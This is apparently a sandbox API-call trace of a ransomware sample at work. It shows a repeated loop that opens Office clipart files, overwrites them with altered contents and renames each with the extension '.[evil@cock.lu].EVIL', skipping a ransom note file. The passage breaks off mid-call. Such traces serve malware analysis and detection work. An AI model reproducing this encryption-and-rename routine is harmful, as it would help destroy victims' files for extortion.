wcsstr (_Str="C:\\Users\\CIiHmnxMn6Ps\\Desktop\\f3c7a8dc83493b7257a705843ba350e171572666483de057f85f92da510f0eba.exe", _SubStr="DD00256_.WMF") returned 0x0 [0114.781] wcslen (_String="C:\\\\Program Files\\Microsoft Office\\root\\CLIPART\\PUB60COR\\DD00256_.WMF") returned 0x45 [0114.781] CreateFileW (lpFileName="C:\\\\Program Files\\Microsoft Office\\root\\CLIPART\\PUB60COR\\DD00256_.WMF" (normalized: "c:\\program files\\microsoft office\\root\\clipart\\pub60cor\\dd00256_.wmf"), dwDesiredAccess=0xc0000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x1a8 [0114.782] ReadFile (in: hFile=0x1a8, lpBuffer=0x84b2e24040, nNumberOfBytesToRead=0x100000, lpNumberOfBytesRead=0x84b0fdd7a0, lpOverlapped=0x0 | out: lpBuffer=0x84b2e24040*, lpNumberOfBytesRead=0x84b0fdd7a0*=0xb10, lpOverlapped=0x0) returned 1 [0114.805] ??8type_info@@QEBAHAEBV0@@Z () returned 0x0 [0114.805] ??9type_info@@QEBAHAEBV0@@Z () returned 0x0 [0114.805] _errno () returned 0x84b1160840 [0114.805] SetFilePointer (in: hFile=0x1a8, lDistanceToMove=0, lpDistanceToMoveHigh=0x0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x0) returned 0x0 [0114.805] WriteFile (in: hFile=0x1a8, lpBuffer=0x84b2e24040*, nNumberOfBytesToWrite=0xb20, lpNumberOfBytesWritten=0x84b0fdd7a0, lpOverlapped=0x0 | out: lpBuffer=0x84b2e24040*, lpNumberOfBytesWritten=0x84b0fdd7a0*=0xb20, lpOverlapped=0x0) returned 1 [0114.805] CloseHandle (hObject=0x1a8) returned 1 [0114.806] _wfsopen (_FileName="C:\\\\Program Files\\Microsoft Office\\root\\CLIPART\\PUB60COR\\DD00256_.WMF", _Mode="a", _ShFlag=64) returned 0x7ffc020ee2a0 [0114.806] fputc (in: _Ch=51, _File=0x7ffc020ee2a0 | out: _File=0x7ffc020ee2a0) returned 51 [0114.806] __uncaught_exception () returned 0x84b1160800 [0114.806] fclose (in: _File=0x7ffc020ee2a0 | out: _File=0x7ffc020ee2a0) returned 0 [0114.806] MoveFileW (lpExistingFileName="C:\\\\Program Files\\Microsoft Office\\root\\CLIPART\\PUB60COR\\DD00256_.WMF" (normalized: "c:\\program files\\microsoft office\\root\\clipart\\pub60cor\\dd00256_.wmf"), lpNewFileName="C:\\\\Program Files\\Microsoft Office\\root\\CLIPART\\PUB60COR\\DD00256_.WMF.[evil@cock.lu].EVIL" (normalized: "c:\\program files\\microsoft office\\root\\clipart\\pub60cor\\dd00256_.wmf.[evil@cock.lu].evil")) returned 1 [0114.807] ??_V@YAXPEAX@Z () returned 0x1 [0114.809] SetFileAttributesW (lpFileName="C:\\\\Program Files\\Microsoft Office\\root\\CLIPART\\PUB60COR\\DD00256_.WMF", dwFileAttributes=0x200) returned 0 [0114.809] FindNextFileW (in: hFindFile=0x84b11dd980, lpFindFileData=0x84b0fdda00 | out: lpFindFileData=0x84b0fdda00) returned 1 [0114.809] wcsstr (_Str="DD00261_.WMF", _SubStr=".[evil@cock.lu].EVIL") returned 0x0 [0114.809] _snwprintf (in: _Dest=0x84b0fddc50, _Count=0x104, _Format="%s\\%s" | out: _Dest="C:\\\\Program Files\\Microsoft Office\\root\\CLIPART\\PUB60COR\\DD00261_.WMF") returned 69 [0114.810] wcscmp (_String1="DD00261_.WMF", _String2="!_HOW_RECOVERY_FILES_!.txt") returned 1 [0114.810] wcsstr (_Str="C:\\Users\\CIiHmnxMn6Ps\\Desktop\\f3c7a8dc83493b7257a705843ba350e171572666483de057f85f92da510f0eba.exe", _SubStr="DD00261_.WMF") returned 0x0 [0114.810] wcslen (_String="C:\\\\Program Files\\Microsoft Office\\root\\CLIPART\\PUB60COR\\DD00261_.WMF") returned 0x45 [0114.810] CreateFileW (lpFileName="C:\\\\Program Files\\Microsoft Office\\root\\CLIPART\\PUB60COR\\DD00261_.WMF" (normalized: "c:\\program files\\microsoft office\\root\\clipart\\pub60cor\\dd00261_.wmf"), dwDesiredAccess=0xc0000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x1a8 [0114.811] ReadFile (in: hFile=0x1a8, lpBuffer=0x84b2e21040, nNumberOfBytesToRead=0x100000, lpNumberOfBytesRead=0x84b0fdd7a0, lpOverlapped=0x0 | out: lpBuffer=0x84b2e21040*, lpNumberOfBytesRead=0x84b0fdd7a0*=0x9456, lpOverlapped=0x0) returned 1 [0114.818] ??8type_info@@QEBAHAEBV0@@Z () returned 0x0 [0114.818] ??9type_info@@QEBAHAEBV0@@Z () returned 0x0 [0114.818] _errno () returned 0x84b1160840 [0114.818] SetFilePointer (in: hFile=0x1a8, lDistanceToMove=0, lpDistanceToMoveHigh=0x0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x0) returned 0x0 [0114.818] WriteFile (in: hFile=0x1a8, lpBuffer=0x84b2e21040*, nNumberOfBytesToWrite=0x9460, lpNumberOfBytesWritten=0x84b0fdd7a0, lpOverlapped=0x0 | out: lpBuffer=0x84b2e21040*, lpNumberOfBytesWritten=0x84b0fdd7a0*=0x9460, lpOverlapped=0x0) returned 1 [0114.819] CloseHandle (hObject=0x1a8) returned 1 [0114.819] _wfsopen (_FileName="C:\\\\Program Files\\Microsoft Office\\root\\CLIPART\\PUB60COR\\DD00261_.WMF", _Mode="a", _ShFlag=64) returned 0x7ffc020ee2a0 [0114.819] fputc (in: _Ch=51, _File=0x7ffc020ee2a0 | out: _File=0x7ffc020ee2a0) returned 51 [0114.819] __uncaught_exception () returned 0x84b1160800 [0114.819] fclose (in: _File=0x7ffc020ee2a0 | out: _File=0x7ffc020ee2a0) returned 0 [0114.819] MoveFileW (lpExistingFileName="C:\\\\Program Files\\Microsoft Office\\root\\CLIPART\\PUB60COR\\DD00261_.WMF" (normalized: "c:\\program files\\microsoft office\\root\\clipart\\pub60cor\\dd00261_.wmf"), lpNewFileName="C:\\\\Program Files\\Microsoft Office\\root\\CLIPART\\PUB60COR\\DD00261_.WMF.[evil@cock.lu].EVIL" (normalized: "c:\\program files\\microsoft office\\root\\clipart\\pub60cor\\dd00261_.wmf.[evil@cock.lu].evil")) returned 1 [0114.820] ??_V@YAXPEAX@Z () returned 0x1 [0114.822] SetFileAttributesW (lpFileName="C:\\\\Program Files\\Microsoft Office\\root\\CLIPART\\PUB60COR\\DD00261_.WMF", dwFileAttributes=0x200) returned 0 [0114.822] FindNextFileW (in: hFindFile=0x84b11dd980, lpFindFileData=0x84b0fdda00 | out: lpFindFileData=0x84b0fdda00) returned 1 [0114.822] wcsstr (_Str="DD00297_.WMF", _SubStr=".[evil@cock.lu].EVIL") returned 0x0 [0114.822] _snwprintf (in: _Dest=0x84b0fddc50, _Count=0x104, _Format="%s\\%s" | out: _Dest="C:\\\\Program Files\\Microsoft Office\\root\\CLIPART\\PUB60COR\\DD00297_.WMF") returned 69 [0114.822] wcscmp (_String1="DD00297_.WMF", _String2="!_HOW_RECOVERY_FILES_!.txt") returned 1 [0114.822] wcsstr (_Str="C:\\Users\\CIiHmnxMn6Ps\\Desktop\\f3c7a8dc83493b7257a705843ba350e171572666483de057f85f92da510f0eba.exe", _SubStr="DD00297_.WMF") returned 0x0 [0114.822] wcslen (_String="C:\\\\Program Files\\Microsoft Office\\root\\CLIPART\\PUB60COR\\DD00297_.WMF") returned 0x45 [0114.822] CreateFileW (lpFileName="C:\\\\Program Files\\Microsoft Office\\root\\CLIPART\\PUB60COR\\DD00297_.WMF" (normalized: "c:\\program files\\microsoft office\\root\\clipart\\pub60cor\\dd00297_.wmf"), dwDesiredAccess=0xc0000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x1a8 [0114.824] ReadFile (in: hFile=0x1a8, lpBuffer=0x84b2e2d040, nNumberOfBytesToRead=0x100000, lpNumberOfBytesRead=0x84b0fdd7a0, lpOverlapped=0x0 | out: lpBuffer=0x84b2e2d040*, lpNumberOfBytesRead=0x84b0fdd7a0*=0x9c5e, lpOverlapped=0x0) returned 1 [0114.864] ??8type_info@@QEBAHAEBV0@@Z () returned 0x0 [0114.864] ??9type_info@@QEBAHAEBV0@@Z () returned 0x0 [0114.864] _errno () returned 0x84b1160840 [0114.864] SetFilePointer (in: hFile=0x1a8, lDistanceToMove=0, lpDistanceToMoveHigh=0x0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x0) returned 0x0 [0114.864] WriteFile (in: hFile=0x1a8, lpBuffer=0x84b2e2d040*, nNumberOfBytesToWrite=0x9c60, lpNumberOfBytesWritten=0x84b0fdd7a0, lpOverlapped=0x0 | out: lpBuffer=0x84b2e2d040*, lpNumberOfBytesWritten=0x84b0fdd7a0*=0x9c60, lpOverlapped=0x0) returned 1 [0114.865] CloseHandle (hObject=0x1a8) returned 1 [0114.865] _wfsopen (_FileName="C:\\\\Program Files\\Microsoft Office\\root\\CLIPART\\PUB60COR\\DD00297_.WMF", _Mode="a", _ShFlag=64) returned 0x7ffc020ee2a0 [0114.865] fputc (in: _Ch=51, _File=0x7ffc020ee2a0 | out: _File=0x7ffc020ee2a0) returned 51 [0114.865] __uncaught_exception () returned 0x84b1160800 [0114.865] fclose (in: _File=0x7ffc020ee2a0 | out: _File=0x7ffc020ee2a0) returned 0 [0114.865] MoveFileW (lpExistingFileName="C:\\\\Program Files\\Microsoft Office\\root\\CLIPART\\PUB60COR\\DD00297_.WMF" (normalized: "c:\\program files\\microsoft office\\root\\clipart\\pub60cor\\dd00297_.wmf"), lpNewFileName="C:\\\\Program Files\\Microsoft Office\\root\\CLIPART\\PUB60COR\\DD00297_.WMF.[evil@cock.lu].EVIL" (normalized: "c:\\program files\\microsoft office\\root\\clipart\\pub60cor\\dd00297_.wmf.[evil@cock.lu].evil")) returned 1 [0114.866] ??_V@YAXPEAX@Z () returned 0x1 [0114.869] SetFileAttributesW (lpFileName="C:\\\\Program Files\\Microsoft Office\\root\\CLIPART\\PUB60COR\\DD00297_.WMF", dwFileAttributes=0x200) returned 0 [0114.869] FindNextFileW (in: hFindFile=0x84b11dd980, lpFindFileData=0x84b0fdda00 | out: lpFindFileData=0x84b0fdda00) returned 1 [0114.869] wcsstr (_Str="DD00372_.WMF", _SubStr=".[evil@cock.lu].EVIL") returned 0x0 [0114.869] _snwprintf (in: _Dest=0x84b0fddc50, _Count=0x104, _Format="%s\\%s" | out: _Dest="C:\\\\Program Files\\Microsoft Office\\root\\CLIPART\\PUB60COR\\DD00372_.WMF") returned 69 [0114.869] wcscmp (_String1="DD00372_.WMF", _String2="!_HOW_RECOVERY_FILES_!.txt") returned 1 [0114.869] wcsstr (_Str="C:\\Users\\CIiHmnxMn6Ps\\Desktop\\f3c7a8dc83493b7257a705843ba350e171572666483de057f85f92da510f0eba.exe", _SubStr="DD00372_.WMF") returned 0x0 [0114.869] wcslen (_String="C:\\\\Program Files\\Microsoft Office\\root\\CLIPART\\PUB60COR\\DD00372_.WMF") returned 0x45 [0114.869] CreateFileW (lpFileName="C:\\\\Program Files\\Microsoft Office\\root\\CLIPART\\PUB60COR\\DD00372_.WMF" (normalized: "c:\\program files\\microsoft office\\root\\clipart\\pub60cor\\dd00372_.wmf"), dwDesiredAccess=0xc0000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x1a8 [0114.870] ReadFile (in: hFile=0x1a8, lpBuffer=0x84b2e2b040, nNumberOfBytesToRead=0x100000, lpNumberOfBytesRead=0x84b0fdd7a0, lpOverlapped=0x0 | out: lpBuffer=0x84b2e2b040*, lpNumberOfBytesRead=0x84b0fdd7a0*=0x318, lpOverlapped=0x0) returned 1 [0114.901] ??8type_info@@QEBAHAEBV0@@Z () returned 0x0 [0114.901] ??9type_info@@QEBAHAEBV0@@Z () returned 0x0 [0114.901] _errno () returned 0x84b1160840 [0114.901] SetFilePointer (in: hFile=0x1a8, lDistanceToMove=0, lpDistanceToMoveHigh=0x0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x0) returned 0x0 [0114.901] WriteFile (in: hFile=0x1a8, lpBuffer=0x84b2e2b040*, nNumberOfBytesToWrite=0x320, lpNumberOfBytesWritten=0x84b0fdd7a0, lpOverlapped=0x0 | out: lpBuffer=0x84b2e2b040*, lpNumberOfBytesWritten=0x84b0fdd7a0*=0x320, lpOverlapped=0x0) returned 1 [0114.901] CloseHandle (hObject=0x1a8) returned 1 [0114.901] _wfsopen (_FileName="C:\\\\Program Files\\Microsoft Office\\root\\CLIPART\\PUB60COR\\DD00372_.WMF", _Mode="a", _ShFlag=64) returned 0x7ffc020ee2a0 [0114.902] fputc (in: _Ch=51, _File=0x7ffc020ee2a0 | out: _File=0x7ffc020ee2a0) returned 51 [0114.902] __uncaught_exception () returned 0x84b1160800 [0114.902] fclose (in: _File=0x7ffc020ee2a0 | out: _File=0x7ffc020ee2a0) returned 0 [0114.902] MoveFileW (lpExistingFileName="C:\\\\Program Files\\Microsoft Office\\root\\CLIPART\\PUB60COR\\DD00372_.WMF" (normalized: "c:\\program files\\microsoft office\\root\\clipart\\pub60cor\\dd00372_.wmf"), lpNewFileName="C:\\\\Program Files\\Microsoft Office\\root\\CLIPART\\PUB60COR\\DD00372_.WMF.[evil@cock.lu].EVIL" (normalized: "c:\\program files\\microsoft office\\root\\clipart\\pub60cor\\dd00372_.wmf.[evil@cock.lu].evil")) returned 1 [0114.903] ??_V@YAXPEAX@Z () returned 0x1 [0114.905] SetFileAttributesW (lpFileName="C:\\\\Program Files\\Microsoft Office\\root\\CLIPART\\PUB60COR\\DD00372_.WMF", dwFileAttributes=0x200) returned 0 [0114.905] FindNextFileW (in: hFindFile=0x84b11dd980, lpFindFileData=0x84b0fdda00 | out: lpFindFileData=0x84b0fdda00) returned 1 [0114.905] wcsstr (_Str="DD00405_.WMF", _SubStr=".[evil@cock.lu].EVIL") returned 0x0 [0114.905] _snwprintf (in: _Dest=0x84b0fddc50, _Count=0x104, _Format="%s\\%s" | out: _Dest="C:\\\\Program Files\\Microsoft Office\\root\\CLIPART\\PUB60COR\\DD00405_.WMF") returned 69 [0114.905] wcscmp (_String1="DD00405_.WMF", _String2="!_HOW_RECOVERY_FILES_!.txt") returned 1 [0114.905] wcsstr (_Str="C:\\Users\\CIiHmnxMn6Ps\\Desktop\\f3c7a8dc83493b7257a705843ba350e171572666483de057f85f92da510f0eba.exe", _SubStr="DD00405_.WMF") returned 0x0 [0114.905] wcslen (_String="C:\\\\Program Files\\Microsoft Office\\root\\CLIPART\\PUB60COR\\DD00405_.WMF") returned 0x45 [0114.905] CreateFileW (lpFileName="C:\\\\Program Files\\Microsoft Office\\root\\CLIPART\\PUB60COR\\DD00405_.WMF" (normalized: "c:\\program files\\microsoft office\\root\\clipart\\pub60cor\\dd00405_.wmf"), dwDesiredAccess=0xc0000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x1a8 [0114.907] ReadFile (in: hFile=0x1a8, lpBuffer=0x84b2e23040, nNumberOfBytesToRead=0x100000, lpNumberOfBytesRead=0x84b0fdd7a0, lpOverlapped=0x0 | out: lpBuffer=0x84b2e23040*, lpNumberOfBytesRead=0x84b0fdd7a0*=0x44b0, lpOverlapped=0x0) returned 1 [0114.914] ??8type_info@@QEBAHAEBV0@@Z () returned 0x0 [0114.914] ??9type_info@@QEBAHAEBV0@@Z () returned 0x0 [0114.914] _errno () returned 0x84b1160840 [0114.914] SetFilePointer (in: hFile=0x1a8, lDistanceToMove=0, lpDistanceToMoveHigh=0x0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x0) returned 0x0 [0114.914] WriteFile (in: hFile=0x1a8, lpBuffer=0x84b2e23040*, nNumberOfBytesToWrite=0x44c0, lpNumberOfBytesWritten=0x84b0fdd7a0, lpOverlapped=0x0 | out: lpBuffer=0x84b2e23040*, lpNumberOfBytesWritten=0x84b0fdd7a0*=0x44c0, lpOverlapped=0x0) returned 1 [0114.914] CloseHandle (hObject=0x1a8) returned 1 [0114.914] _wfsopen (_FileName="C:\\\\Program Files\\Microsoft Office\\root\\CLIPART\\PUB60COR\\DD00405_.WMF", _Mode="a", _ShFlag=64) returned 0x7ffc020ee2a0 [0114.915] fputc (in: _Ch=51, _File=0x7ffc020ee2a0 | out: _File=0x7ffc020ee2a0) returned 51 [0114.915] __uncaught_exception () returned 0x84b1160800 [0114.915] fclose (in: _File=0x7ffc020ee2a0 | out: _File=0x7ffc020ee2a0) returned 0 [0114.915] MoveFileW (lpExistingFileName="C:\\\\Program Files\\Microsoft Office\\root\\CLIPART\\PUB60COR\\DD00405_.WMF" (normalized: "c:\\program files\\microsoft office\\root\\clipart\\pub60cor\\dd00405_.wmf"), lpNewFileName="C:\\\\Program Files\\Microsoft Office\\root\\CLIPART\\PUB60COR\\DD00405_.WMF.[evil@cock.lu].EVIL" (normalized: "c:\\program files\\microsoft office\\root\\clipart\\pub60cor\\dd00405_.wmf.[evil@cock.lu].evil")) returned 1 [0114.915] ??_V@YAXPEAX@Z () returned 0x1 [0114.918] SetFileAttributesW (lpFileName="C:\\\\Program Files\\Microsoft Office\\root\\CLIPART\\PUB60COR\\DD00405_.WMF", dwFileAttributes=0x200) returned 0 [0114.918] FindNextFileW (in: hFindFile=0x84b11dd980, lpFindFileData=0x84b0fdda00 | out: lpFindFileData=0x84b0fdda00) returned 1 [0114.918] wcsstr (_Str="DD00407_.WMF", _SubStr=".[evil@cock.lu].EVIL") returned 0x0 [0114.918] _snwprintf (in: _Dest=0x84b0fddc50, _Count=0x104, _Format="%s\\%s" | out: _Dest="C:\\\\Program Files\\Microsoft Office\\root\\CLIPART\\PUB60COR\\DD00407_.WMF") returned 69 [0114.918] wcscmp (_String1="DD00407_.WMF", _String2="!_HOW_RECOVERY_FILES_!.txt") returned 1 [0114.918] wcsstr (_Str="C:\\Users\\CIiHmnxMn6Ps\\Desktop\\f3c7a8dc83493b7257a705843ba350e171572666483de057f85f92da510f0eba.exe", _SubStr="DD00407_.WMF") returned 0x0 [0114.918] wcslen (_String="C:\\\\Program Files\\Microsoft Office\\root\\CLIPART\\PUB60COR\\DD00407_.WMF") returned 0x45 [0114.918] CreateFileW (lpFileName="C:\\\\Program Files\\Microsoft Office\\root\\CLIPART\\PUB60COR\\DD00407_.WMF" (normalized: "c:\\program files\\microsoft office\\root\\clipart\\pub60cor\\dd00407_.wmf"), dwDesiredAccess=0xc0000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x1a8 [0114.920] ReadFile (in: hFile=0x1a8, lpBuffer=0x84b2e27040, nNumberOfBytesToRead=0x100000, lpNumberOfBytesRead=0x84b0fdd7a0, lpOverlapped=0x0 | out: lpBuffer=0x84b2e27040*, lpNumberOfBytesRead=0x84b0fdd7a0*=0x1e94, lpOverlapped=0x0) returned 1 [0114.927] ??8type_info@@QEBAHAEBV0@@Z () returned 0x0 [0114.927] ??9type_info@@QEBAHAEBV0@@Z () returned 0x0 [0114.927] _errno () returned 0x84b1160840 [0114.927] SetFilePointer (in: hFile=0x1a8, lDistanceToMove=0, lpDistanceToMoveHigh=0x0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x0) returned 0x0 [0114.927] WriteFile (in: hFile=0x1a8, lpBuffer=0x84b2e27040*, nNumberOfBytesToWrite=0x1ea0, lpNumberOfBytesWritten=0x84b0fdd7a0, lpOverlapped=0x0 | out: lpBuffer=0x84b2e27040*, lpNumberOfBytesWritten=0x84b0fdd7a0*=0x1ea0, lpOverlapped=0x0) returned 1 [0114.927] CloseHandle (hObject=0x1a8) returned 1 [0114.927] _wfsopen (_FileName="C:\\\\Program Files\\Microsoft Office\\root\\CLIPART\\PUB60COR\\DD00407_.WMF", _Mode="a", _ShFlag=64) returned 0x7ffc020ee2a0 [0114.928] fputc (in: _Ch=51, _File=0x7ffc020ee2a0 | out: _File=0x7ffc020ee2a0) returned 51 [0114.928] __uncaught_exception () returned 0x84b1160800 [0114.928] fclose (in: _File=0x7ffc020ee2a0 | out: _File=0x7ffc020ee2a0) returned 0 [0114.928] MoveFileW (lpExistingFileName="C:\\\\Program Files\\Microsoft Office\\root\\CLIPART\\PUB60COR\\DD00407_.WMF" (normalized: "c:\\program files\\microsoft office\\root\\clipart\\pub60cor\\dd00407_.wmf"), lpNewFileName="C:\\\\Program Files\\Microsoft Office\\root\\CLIPART\\PUB60COR\\DD00407_.WMF.[evil@cock.lu].EVIL" (normalized: "c:\\program files\\microsoft office\\root\\clipart\\pub60cor\\dd00407_.wmf.[evil@cock.lu].evil")) returned 1 [0114.929] ??_V@YAXPEAX@Z () returned 0x1 [0114.931] SetFileAttributesW (lpFileName="C:\\\\Program Files\\Microsoft Office\\root\\CLIPART\\PUB60COR\\DD00407_.WMF", dwFileAttributes=0x200) returned 0 [0114.931] FindNextFileW (in: hFindFile=0x84b11dd980, lpFindFileData=0x84b0fdda00 | out: lpFindFileData=0x84b0fdda00) returned 1 [0114.931] wcsstr (_Str="DD00413_.WMF", _SubStr=".[evil@cock.lu].EVIL") returned 0x0 [0114.931] _snwprintf (in: _Dest=0x84b0fddc50, _Count=0x104, _Format="%s\\%s" | out: _Dest="C:\\\\Program Files\\Microsoft Office\\root\\CLIPART\\PUB60COR\\DD00413_.WMF") returned 69 [0114.931] wcscmp (_String1="DD00413_.WMF", _String2="!_HOW_RECOVERY_FILES_!.txt") returned 1 [0114.931] wcsstr (_Str="C:\\Users\\CIiHmnxMn6Ps\\Desktop\\f3c7a8dc83493b7257a705843ba350e171572666483de057f85f92da510f0eba.exe", _SubStr="DD00413_.WMF") returned 0x0 [0114.931] wcslen (_String="C:\\\\Program Files\\Microsoft Office\\root\\CLIPART\\PUB60COR\\DD00413_.WMF") returned 0x45 [0114.932] CreateFileW (lpFileName="C:\\\\Program Files\\Microsoft Office\\root\\CLIPART\\PUB60COR\\DD00413_.WMF" (normalized: "c:\\program files\\microsoft office\\root\\clipart\\pub60cor\\dd00413_.wmf"), dwDesiredAccess=0xc0000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x1a8 [0114.934] ReadFile (in: hFile=0x1a8, lpBuffer=0x84b2e24040, nNumberOfBytesToRead=0x100000, lpNumberOfBytesRead=0x84b0fdd7a0, lpOverlapped=0x0 | out: lpBuffer=0x84b2e24040*, lpNumberOfBytesRead=0x84b0fdd7a0*=0xa7f0, lpOverlapped=0x0) returned 1 [0114.980] ??8type_info@@QEBAHAEBV0@@Z () returned 0x0 [0114.980] ??9type_info@@QEBAHAEBV0@@Z () returned 0x0 [0114.980] _errno () returned 0x84b1160840 [0114.980] SetFilePointer (in: hFile=0x1a8, lDistanceToMove=0, lpDistanceToMoveHigh=0x0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x0) returned 0x0 [0114.980] WriteFile (in: hFile=0x1a8, lpBuffer=0x84b2e24040*, nNumberOfBytesToWrite=0xa800, lpNumberOfBytesWritten=0x84b0fdd7a0, lpOverlapped=0x0 | out: lpBuffer=0x84b2e24040*, lpNumberOfBytesWritten=0x84b0fdd7a0*=0xa800, lpOverlapped=0x0) returned 1 [0114.981] CloseHandle (hObject=0x1a8) returned 1 [0114.981] _wfsopen (_FileName="C:\\\\Program Files\\Microsoft Office\\root\\CLIPART\\PUB60COR\\DD00413_.WMF", _Mode="a", _ShFlag=64) returned 0x7ffc020ee2a0 [0114.981] fputc (in: _Ch=51, _File=0x7ffc020ee2a0 | out: _File=0x7ffc020ee2a0) returned 51 [0114.981] __uncaught_exception () returned 0x84b1160800 [0114.981] fclose (in: _File=0x7ffc020ee2a0 | out: _File=0x7ffc020ee2a0) returned 0 [0114.981] MoveFileW (lpExistingFileName="C:\\\\Program Files\\Microsoft Office\\root\\CLIPART\\PUB60COR\\DD00413_.WMF" (normalized: "c:\\program files\\microsoft office\\root\\clipart\\pub60cor\\dd00413_.wmf"), lpNewFileName="C:\\\\Program Files\\Microsoft Office\\root\\CLIPART\\PUB60COR\\DD00413_.WMF.[evil@cock.lu].EVIL" (normalized: "c:\\program files\\microsoft office\\root\\clipart\\pub60cor\\dd00413_.wmf.[evil@cock.lu].evil")) returned 1 [0114.982] ??_V@YAXPEAX@Z () returned 0x1 [0114.984] SetFileAttributesW (lpFileName="C:\\\\Program Files\\Microsoft Office\\root\\CLIPART\\PUB60COR\\DD00413_.WMF", dwFileAttributes=0x200) returned 0 [0114.985] FindNextFileW (in: hFindFile=0x84b11dd980, lpFindFileData=0x84b0fdda00 | out: lpFindFileData=0x84b0fdda00) returned 1 [0114.985] wcsstr (_Str="DD00414_.WMF", _SubStr=".[evil@cock.lu].EVIL") returned 0x0 [0114.985] _snwprintf (in: _Dest=0x84b0fddc50, _Count=0x104, _Format="%s\\%s" | out: _Dest="C:\\\\Program Files\\Microsoft Office\\root\\CLIPART\\PUB60COR\\DD00414_.WMF") returned 69 [0114.985] wcscmp (_String1="DD00414_.WMF", _String2="!_HOW_RECOVERY_FILES_!.txt") returned 1 [0114.985] wcsstr (_Str="C:\\Users\\CIiHmnxMn6Ps\\Desktop\\f3c7a8dc83493b7257a705843ba350e171572666483de057f85f92da510f0eba.exe", _SubStr="DD00414_.WMF") returned 0x0 [0114.985] wcslen (_String="C:\\\\Program Files\\Microsoft Office\\root\\CLIPART\\PUB60COR\\DD00414_.WMF") returned 0x45 [0114.985] CreateFileW (lpFileName="C:\\\\Program Files\\Microsoft Office\\root\\CLIPART\\PUB60COR\\DD00414_.WMF" (normalized: "c:\\program files\\microsoft office\\root\\clipart\\pub60cor\\dd00414_.wmf"), dwDesiredAccess=0xc0000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x1a8 [0114.988] ReadFile (in: hFile=0x1a8, lpBuffer=0x84b2e29040, nNumberOfBytesToRead=0x100000, lpNumberOfBytesRead=0x84b0fdd7a0, lpOverlapped=0x0 | out: lpBuffer=0x84b2e29040*, lpNumberOfBytesRead=0x84b0fdd7a0*=0xa79c, lpOverlapped=0x0) returned 1 [0115.180] ??8type_info@@QEBAHAEBV0@@Z () returned 0x0 [0115.180] ??9type_info@@QEBAHAEBV0@@Z () returned 0x0 [0115.180] _errno () returned 0x84b1160840 [0115.180] SetFilePointer (in: hFile=0x1a8, lDistanceToMove=0, lpDistanceToMoveHigh=0x0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x0) returned 0x0 [0115.181] WriteFile (in: hFile=0x1a8, lpBuffer=0x84b2e29040*, nNumberOfBytesToWrite=0xa7a0, lpNumberOfBytesWritten=0x84b0fdd7a0, lpOverlapped=0x0 | out: lpBuffer=0x84b2e29040*, lpNumberOfBytesWritten=0x84b0fdd7a0*=0xa7a0, lpOverlapped=0x0) returned 1 [0115.225] CloseHandle (hObject=0x1a8) returned 1 [0115.225] _wfsopen (_FileName="C:\\\\Program Files\\Microsoft Office\\root\\CLIPART\\PUB60COR\\DD00414_.WMF", _Mode="a", _ShFlag=64) returned 0x7ffc020ee2a0 [0115.225] fputc (in: _Ch=51, _File=0x7ffc020ee2a0 | out: _File=0x7ffc020ee2a0) returned 51 [0115.225] __uncaught_exception () returned 0x84b1160800 [0115.226] fclose (in: _File=0x7ffc020ee2a0 | out: _File=0x7ffc020ee2a0) returned 0 [0115.226] MoveFileW (lpExistingFileName="C:\\\\Program Files\\Microsoft Office\\root\\CLIPART\\PUB60COR\\DD00414_.WMF" (normalized: "c:\\program files\\microsoft office\\root\\clipart\\pub60cor\\dd00414_.wmf"), lpNewFileName="C:\\\\Program Files\\Microsoft Office\\root\\CLIPART\\PUB60COR\\DD00414_.WMF.[evil@cock.lu].EVIL" (normalized: "c:\\program files\\microsoft office\\root\\clipart\\pub60cor\\dd00414_.wmf.[evil@cock.lu].evil")) returned 1 [0115.226] ??_V@YAXPEAX@Z () returned 0x1 [0115.229] SetFileAttributesW (lpFileName="C:\\\\Program Files\\Microsoft Office\\root\\CLIPART\\PUB60COR\\DD00414_.WMF", dwFileAttributes=0x200) returned 0 [0115.229] FindNextFileW (in: hFindFile=0x84b11dd980, lpFindFileData=0x84b0fdda00 | out: lpFindFileData=0x84b0fdda00) returned 1 [0115.229] wcsstr (_Str="DD00419_.WMF", _SubStr=".[evil@cock.lu].EVIL") returned 0x0 [0115.229] _snwprintf (in: _Dest=0x84b0fddc50, _Count=0x104, _Format="%s\\%s" | out: _Dest="C:\\\\Program Files\\Microsoft Office\\root\\CLIPART\\PUB60COR\\DD00419_.WMF") returned 69 [0115.229] wcscmp (_String1="DD00419_.WMF", _String2="!_HOW_RECOVERY_FILES_!.txt") returned 1 [0115.229] wcsstr (_Str="C:\\Users\\CIiHmnxMn6Ps\\Desktop\\f3c7a8dc83493b7257a705843ba350e171572666483de057f85f92da510f0eba.exe", _SubStr="DD00419_.WMF") returned 0x0 [0115.229] wcslen (_String="C:\\\\Program Files\\Microsoft Office\\root\\CLIPART\\PUB60COR\\DD00419_.WMF") returned 0x45 [0115.229] CreateFileW (lpFileName="C:\\\\Program Files\\Microsoft 